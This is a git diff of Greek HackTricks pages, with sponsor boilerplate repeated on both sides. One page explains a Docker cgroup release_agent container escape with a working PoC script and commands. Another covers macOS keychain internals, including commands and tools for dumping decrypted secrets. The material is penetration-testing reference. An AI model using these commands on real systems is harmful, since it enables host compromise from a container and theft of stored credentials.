Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,23 +1,34 @@
|
|||
# Διαφυγή από τα cgroups του Docker με το release_agent
|
||||
# Διαφυγή από cgroups με το Docker release_agent
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF**, ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
**Για περισσότερες λεπτομέρειες, ανατρέξτε στην [αρχική ανάρτηση στο blog](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** Αυτό είναι απλώς ένα σύνοψη:
|
||||
|
||||
Αρχικό PoC:
|
||||
```shell
|
||||
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
|
||||
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
|
||||
|
@ -25,50 +36,62 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
|||
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
|
||||
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
|
||||
```
|
||||
Το αποδεικτικό προσχέδιο (PoC) δείχνει έναν τρόπο εκμετάλλευσης των cgroups δημιουργώντας ένα αρχείο `release_agent` και ενεργοποιώντας την κλήση του για να εκτελέσει αυθαίρετες εντολές στον κεντρικό υπολογιστή του container. Παρακάτω παρουσιάζονται οι βήματα που απαιτούνται:
|
||||
Η απόδειξη του concept (PoC) δείχνει έναν τρόπο εκμετάλλευσης των cgroups με τη δημιουργία ενός αρχείου `release_agent` και την ενεργοποίηση της κλήσης του για να εκτελέσει αυθαίρετες εντολές στον υπολογιστή-φιλοξενούμενο του container. Εδώ υπάρχει μια ανάλυση των βημάτων που εμπλέκονται:
|
||||
|
||||
1. **Προετοιμασία του Περιβάλλοντος:**
|
||||
- Δημιουργείται ένας φάκελος `/tmp/cgrp` για να λειτουργήσει ως σημείο προσάρτησης για τα cgroups.
|
||||
- Ο ελεγκτής cgroup RDMA προσαρτάται σε αυτόν τον φάκελο. Σε περίπτωση που λείπει ο ελεγκτής RDMA, προτείνεται να χρησιμοποιηθεί ο ελεγκτής cgroup `memory` ως εναλλακτική λύση.
|
||||
- Δημιουργείται ένας κατάλογος `/tmp/cgrp` για να λειτουργήσει ως σημείο προσάρτησης για το cgroup.
|
||||
- Ο ελεγκτής cgroup RDMA προσαρτάται σε αυτόν τον κατάλογο. Σε περίπτωση απουσίας του ελεγκτή RDMA, προτείνεται η χρήση του ελεγκτή cgroup `memory` ως εναλλακτική λύση.
|
||||
```shell
|
||||
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
||||
```
|
||||
2. **Δημιουργία του Παιδικού Cgroup:**
|
||||
- Δημιουργείται ένα παιδικό cgroup με το όνομα "x" εντός του καταλόγου του προσαρτημένου cgroup.
|
||||
- Ενεργοποιούνται οι ειδοποιήσεις για το cgroup "x" γράφοντας τον αριθμό 1 στο αρχείο notify_on_release.
|
||||
- Δημιουργείται ένα παιδικό cgroup με το όνομα "x" εντός του καταλόγου cgroup που έχει τοποθετηθεί.
|
||||
- Ενεργοποιούνται οι ειδοποιήσεις για το cgroup "x" γράφοντας τον αριθμό 1 στο αρχείο notify_on_release του.
|
||||
```shell
|
||||
echo 1 > /tmp/cgrp/x/notify_on_release
|
||||
```
|
||||
3. **Διαμορφώστε τον Πράκτορα Απελευθέρωσης:**
|
||||
- Η διαδρομή του container στον host ανακτάται από το αρχείο /etc/mtab.
|
||||
- Στη συνέχεια, το αρχείο release_agent του cgroup διαμορφώνεται για να εκτελεί ένα σενάριο με το όνομα /cmd που βρίσκεται στην αποκτηθείσα διαδρομή του host.
|
||||
3. **Διαμόρφωση του Παράγοντα Απελευθέρωσης:**
|
||||
- Η διαδρομή του container στον host λαμβάνεται από το αρχείο /etc/mtab.
|
||||
- Στη συνέχεια, το αρχείο release_agent του cgroup διαμορφώνεται ώστε να εκτελέσει ένα σενάριο με το όνομα /cmd που βρίσκεται στην αποκτηθείσα διαδρομή του host.
|
||||
```shell
|
||||
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
||||
echo "$host_path/cmd" > /tmp/cgrp/release_agent
|
||||
```
|
||||
4. **Δημιουργία και Ρύθμιση του Σεναρίου /cmd:**
|
||||
- Το σενάριο /cmd δημιουργείται μέσα στον εμπορευματοκιβώτιο και ρυθμίζεται να εκτελεί την εντολή ps aux, ανακατευθύνοντας την έξοδο σε ένα αρχείο με όνομα /output στον εμπορευματοκιβώτιο. Καθορίζεται ο πλήρης δρομολόγιος του /output στον κεντρικό υπολογιστή.
|
||||
- Το σενάριο /cmd δημιουργείται μέσα στο container και ρυθμίζεται να εκτελεί την εντολή ps aux, μεταφέροντας την έξοδο σε ένα αρχείο με όνομα /output στο container. Καθορίζεται ο πλήρης διαδρομής του /output στον host.
|
||||
```shell
|
||||
echo '#!/bin/sh' > /cmd
|
||||
echo "ps aux > $host_path/output" >> /cmd
|
||||
chmod a+x /cmd
|
||||
```
|
||||
5. **Εκτέλεση της Επίθεσης:**
|
||||
- Ένας διεργασία ξεκινάει εντός του παιδικού cgroup "x" και αμέσως τερματίζεται.
|
||||
- Αυτό ενεργοποιεί το `release_agent` (το /cmd script), το οποίο εκτελεί την εντολή ps aux στον κεντρικό υπολογιστή και γράφει την έξοδο στο /output μέσα στο container.
|
||||
5. **Εκκίνηση της Επίθεσης:**
|
||||
- Ένας διεργασία ξεκινάει εντός του παιδικού cgroup "x" και τερματίζεται αμέσως.
|
||||
- Αυτό ενεργοποιεί το `release_agent` (το σενάριο /cmd), το οποίο εκτελεί την εντολή ps aux στον κεντρικό υπολογιστή και γράφει την έξοδο στο /output μέσα στο container.
|
||||
```shell
|
||||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||
```
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,26 +2,40 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια **dark-web** κινητοποιημένη μηχανή αναζήτησης που προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Κύρια Keychains
|
||||
|
||||
* Το **Keychain του χρήστη** (`~/Library/Keychains/login.keycahin-db`), το οποίο χρησιμοποιείται για να αποθηκεύει **συνθηματικά που αφορούν τον χρήστη** όπως κωδικοί πρόσβασης εφαρμογών, κωδικοί πρόσβασης στο διαδίκτυο, πιστοποιητικά που δημιουργήθηκαν από τον χρήστη, κωδικοί πρόσβασης δικτύου και δημόσια/ιδιωτικά κλειδιά που δημιουργήθηκαν από τον χρήστη.
|
||||
* Το **Keychain του συστήματος** (`/Library/Keychains/System.keychain`), το οποίο αποθηκεύει **συνθηματικά που αφορούν ολόκληρο το σύστημα** όπως κωδικοί πρόσβασης WiFi, πιστοποιητικά ρίζας συστήματος, ιδιωτικά κλειδιά συστήματος και κωδικοί πρόσβασης εφαρμογών συστήματος.
|
||||
* Το **Keychain του Χρήστη** (`~/Library/Keychains/login.keycahin-db`), το οποίο χρησιμοποιείται για την αποθήκευση **συγκεκριμένων διαπιστευτηρίων χρήστη** όπως κωδικοί εφαρμογών, κωδικοί internet, πιστοποιητικά που δημιουργήθηκαν από τον χρήστη, κωδικοί δικτύου και δημιουργημένα δημόσια/ιδιωτικά κλειδιά χρήστη.
|
||||
* Το **Keychain του Συστήματος** (`/Library/Keychains/System.keychain`), το οποίο αποθηκεύει **διαπιστεύσεις σε επίπεδο συστήματος** όπως κωδικοί WiFi, πιστοποιητικά ρίζας συστήματος, ιδιωτικά κλειδιά συστήματος και κωδικοί εφαρμογών συστήματος.
|
||||
|
||||
### Πρόσβαση στο Keychain Κωδικού
|
||||
### Πρόσβαση στο Keychain Κωδικών
|
||||
|
||||
Αυτά τα αρχεία, παρόλο που δεν έχουν ενσωματωμένη προστασία και μπορούν να **κατεβληθούν**, είναι κρυπτογραφημένα και απαιτούν το **καθαρό κείμενο του κωδικού πρόσβασης του χρήστη για να αποκρυπτογραφηθούν**. Ένα εργαλείο όπως το [**Chainbreaker**](https://github.com/n0fate/chainbreaker) μπορεί να χρησιμοποιηθεί για την αποκρυπτογράφηση.
|
||||
Αυτά τα αρχεία, παρόλο που δεν έχουν ενσωματωμένη προστασία και μπορούν να **κατεβαστούν**, είναι κρυπτογραφημένα και απαιτούν τον **καθαρό κείμενο του κωδικού του χρήστη για να αποκρυπτογραφηθούν**. Ένα εργαλείο όπως το [**Chainbreaker**](https://github.com/n0fate/chainbreaker) μπορεί να χρησιμοποιηθεί για την αποκρυπτογράφηση.
|
||||
|
||||
## Προστασίες Καταχωρήσεων Keychain
|
||||
|
||||
|
@ -30,32 +44,42 @@
|
|||
Κάθε καταχώρηση στο keychain διέπεται από **Λίστες Ελέγχου Πρόσβασης (ACLs)** που καθορίζουν ποιος μπορεί να εκτελέσει διάφορες ενέργειες στην καταχώρηση του keychain, συμπεριλαμβανομένων:
|
||||
|
||||
* **ACLAuhtorizationExportClear**: Επιτρέπει στον κάτοχο να λάβει το καθαρό κείμενο του μυστικού.
|
||||
* **ACLAuhtorizationExportWrapped**: Επιτρέπει στον κάτοχο να λάβει το καθαρό κείμενο κρυπτογραφημένο με έναν άλλο καθορισμένο κωδικό πρόσβασης.
|
||||
* **ACLAuhtorizationExportWrapped**: Επιτρέπει στον κάτοχο να λάβει το καθαρό κείμενο κρυπτογραφημένο με έναν άλλο καθορισμένο κωδικό.
|
||||
* **ACLAuhtorizationAny**: Επιτρέπει στον κάτοχο να εκτελέσει οποιαδήποτε ενέργεια.
|
||||
|
||||
Οι ACLs συνοδεύονται επίσης από μια **λίστα αξιόπιστων εφαρμογών** που μπορούν να εκτελέσουν αυτές τις ενέργειες χωρίς να ζητηθεί επιβεβαίωση. Αυτό μπορεί να είναι:
|
||||
Οι ACLs συνοδεύονται επιπλέον από μια **λίστα εμπιστευμένων εφαρμογών** που μπορούν να εκτελέσουν αυτές τις ενέργειες χωρίς προτροπή. Αυτό μπορεί να είναι:
|
||||
|
||||
*  **N`il`** (δεν απαιτείται εξουσιοδότηση, **όλοι είναι αξιόπιστοι**)
|
||||
* Μια **κενή** λίστα (**κανείς** δεν είναι αξιόπιστος)
|
||||
*  **N`il`** (δεν απαιτείται εξουσιοδότηση, **όλοι είναι εμπιστευμένοι**)
|
||||
* Μια **κενή** λίστα (**κανείς δεν είναι εμπιστευμένος**)
|
||||
* **Λίστα** συγκεκριμένων **εφαρμογών**.
|
||||
|
||||
Επίσης, η καταχώρηση μπορεί να περιέχει το κλειδί **`ACLAuthorizationPartitionID`**, το οποίο χρησιμοποιείται για την αναγνώριση του **teamid, apple** και **cdhash**.
|
||||
Επίσης, η καταχώρηση μπορεί να περιέχει το κλειδί **`ACLAuthorizationPartitionID`,** το οποίο χρησιμοποιείται για την αναγνώριση του **teamid, apple,** και **cdhash.**
|
||||
|
||||
* Εάν το **teamid** είναι καθορισμένο, τότε για να **έχει πρόσβαση** στην τιμή της καταχώρησης **χωρίς** ερώτημα, η χρησιμοποιούμενη εφαρμογή πρέπει να έχει το **ίδιο teamid**.
|
||||
* Εάν το **teamid** είναι καθορισμένο, τότε για να **έχει πρόσβαση στην τιμή της καταχώρησης** χωρίς **προτροπή** η χρησιμοποιούμενη εφαρμογή πρέπει να έχει το **ίδιο teamid**.
|
||||
* Εάν το **apple** είναι καθορισμένο, τότε η εφαρμογή πρέπει να είναι **υπογεγραμμένη** από την **Apple**.
|
||||
* Εάν το **cdhash** είναι καθορισμένο, τότε η εφαρμογή πρέπει να έχει το συγκεκριμένο **cdhash**.
|
||||
* Εάν το **cdhash** είναι υποδειγμένο, τότε η εφαρμογή πρέπει να έχει το συγκεκριμένο **cdhash**.
|
||||
|
||||
### Δημιουργία Καταχώρησης Keychain
|
||||
|
||||
Όταν δημιουργείται μια **νέα καταχώρηση** χρησιμοποιώντας το **`Keychain Access.app`**, ισχύουν οι εξής κανόνες:
|
||||
Όταν δημιουργείται μια **νέα** **καταχώρηση** χρησιμοποιώντας το **`Keychain Access.app`**, ισχύουν οι ακόλουθοι κανόνες:
|
||||
|
||||
* Όλες οι εφαρμογές μπορούν να κρυπτογραφήσουν.
|
||||
* **Καμία εφαρμογή** δεν μπορεί να εξαγάγει/αποκρυπτογραφήσει (χωρίς να ζητηθεί επιβεβαίωση από τον χρήστη).
|
||||
* **Καμία εφαρμογή** δεν μπορεί να εξάγει/αποκρυπτογραφήσει (χωρίς προτροπή του χρήστη).
|
||||
* Όλες οι εφαρμογές μπορούν να δουν τον έλεγχο ακεραιότητας.
|
||||
* Καμία εφαρμογή δεν μπορεί να αλλάξει τις ACLs.
|
||||
* Το **partitionID** ορίζεται σε **`apple`**.
|
||||
|
||||
Όταν μια **εφαρμογή δημιουργεί μια καταχώρηση στο keychain**, οι κανόνες είναι ελαφρώς διαφορετ
|
||||
Όταν μια **εφαρμογή δημιουργεί μια καταχώρηση στο keychain**, οι κανόνες είναι ελαφρώς διαφορετικοί:
|
||||
|
||||
* Όλες οι εφαρμογές μπορούν να κρυπτογραφήσουν.
|
||||
* Μόνο η **δημιουργούσα εφαρμογή** (ή οποιεσδήποτε άλλες εφαρμογές προστέθηκαν ρητά) μπορούν να εξάγουν/αποκρυπτογραφήσουν (χωρίς προτροπή του χρήστη).
|
||||
* Όλες οι εφαρμογές μπορούν να δουν τον έλεγχο ακεραιότητας.
|
||||
* Καμία εφαρμογή δεν μπορεί να αλλάξει τις ACLs.
|
||||
* Το **partitionID** ορίζεται σε **`teamid:[teamID εδώ]`**.
|
||||
|
||||
## Πρόσβαση στο Keychain
|
||||
|
||||
### `security`
|
||||
```bash
|
||||
# Dump all metadata and decrypted secrets (a lot of pop-ups)
|
||||
security dump-keychain -a -d
|
||||
|
@ -66,69 +90,84 @@ security find-generic-password -a "Slack" -g
|
|||
# Change the specified entrys PartitionID entry
|
||||
security set-generic-password-parition-list -s "test service" -a "test acount" -S
|
||||
```
|
||||
### ΑΠΙ
|
||||
### ΑΡΙ
|
||||
|
||||
{% hint style="success" %}
|
||||
Η **απαρίθμηση και απόρριψη** μυστικών του **keychain που δεν θα προκαλέσει ερώτηση** μπορεί να γίνει με το εργαλείο [**LockSmith**](https://github.com/its-a-feature/LockSmith)
|
||||
Η **απαρίθμηση κλειδιών και η εξαγωγή μυστικών** που **δεν θα προκαλέσει παράθυρο ειδοποίησης** μπορεί να γίνει με το εργαλείο [**LockSmith**](https://github.com/its-a-feature/LockSmith)
|
||||
{% endhint %}
|
||||
|
||||
Λίστα και λήψη **πληροφοριών** για κάθε καταχώρηση keychain:
|
||||
Καταχωρήστε και λάβετε **πληροφορίες** για κάθε καταχώρηση κλειδιού:
|
||||
|
||||
* Η API **`SecItemCopyMatching`** δίνει πληροφορίες για κάθε καταχώρηση και υπάρχουν ορισμένα χαρακτηριστικά που μπορείτε να ορίσετε κατά τη χρήση της:
|
||||
* **`kSecReturnData`**: Εάν είναι true, θα προσπαθήσει να αποκρυπτογραφήσει τα δεδομένα (ορίστε το σε false για να αποφευχθούν πιθανές αναδυόμενες παράθυρα)
|
||||
* **`kSecReturnRef`**: Λήψη αναφοράς στο στοιχείο keychain (ορίστε το σε true σε περίπτωση που αργότερα δείτε ότι μπορείτε να αποκρυπτογραφήσετε χωρίς αναδυόμενο παράθυρο)
|
||||
* **`kSecReturnAttributes`**: Λήψη μεταδεδομένων για τις καταχωρήσεις
|
||||
* Η ΑΡΙ **`SecItemCopyMatching`** δίνει πληροφορίες για κάθε καταχώρηση και υπάρχουν ορισμένα χαρακτηριστικά που μπορείτε να ορίσετε κατά τη χρήση του:
|
||||
* **`kSecReturnData`**: Εάν είναι true, θα προσπαθήσει να αποκρυπτογραφήσει τα δεδομένα (ορίστε το σε false για να αποφύγετε πιθανά αναδυόμενα παράθυρα)
|
||||
* **`kSecReturnRef`**: Λάβετε επίσης αναφορά στο στοιχείο του keychain (ορίστε το σε true σε περίπτωση που αργότερα δείτε ότι μπορείτε να αποκρυπτογραφήσετε χωρίς παράθυρο ειδοποίησης)
|
||||
* **`kSecReturnAttributes`**: Λάβετε μεταδεδομένα σχετικά με τις καταχωρήσεις
|
||||
* **`kSecMatchLimit`**: Πόσα αποτελέσματα να επιστραφούν
|
||||
* **`kSecClass`**: Τι είδους καταχώρηση keychain
|
||||
* **`kSecClass`**: Τι είδος καταχώρησης keychain
|
||||
|
||||
Λήψη **ACLs** για κάθε καταχώρηση:
|
||||
Λάβετε τα **ACLs** κάθε καταχώρησης:
|
||||
|
||||
* Με την API **`SecAccessCopyACLList`** μπορείτε να λάβετε το **ACL για το στοιχείο keychain**, και θα επιστρέψει μια λίστα με τα ACLs (όπως `ACLAuhtorizationExportClear` και τα άλλα προηγουμένως αναφερθέντα) όπου κάθε λίστα έχει:
|
||||
* Με την ΑΡΙ **`SecAccessCopyACLList`** μπορείτε να λάβετε το **ACL για το στοιχείο του keychain**, και θα επιστρέψει μια λίστα με ACLs (όπως `ACLAuhtorizationExportClear` και τα άλλα προηγουμένως αναφερθέντα) όπου κάθε λίστα έχει:
|
||||
* Περιγραφή
|
||||
* **Λίστα Εμπιστευμένων Εφαρμογών**. Αυτό μπορεί να είναι:
|
||||
* Μια εφαρμογή: /Applications/Slack.app
|
||||
* Ένα δυαδικό αρχείο: /usr/libexec/airportd
|
||||
* Μια ομάδα: group://AirPort
|
||||
|
||||
Εξαγωγή των δεδομένων:
|
||||
Εξαγωγή δεδομένων:
|
||||
|
||||
* Η API **`SecKeychainItemCopyContent`** λαμβάνει το κείμενο καθαρού κειμένου
|
||||
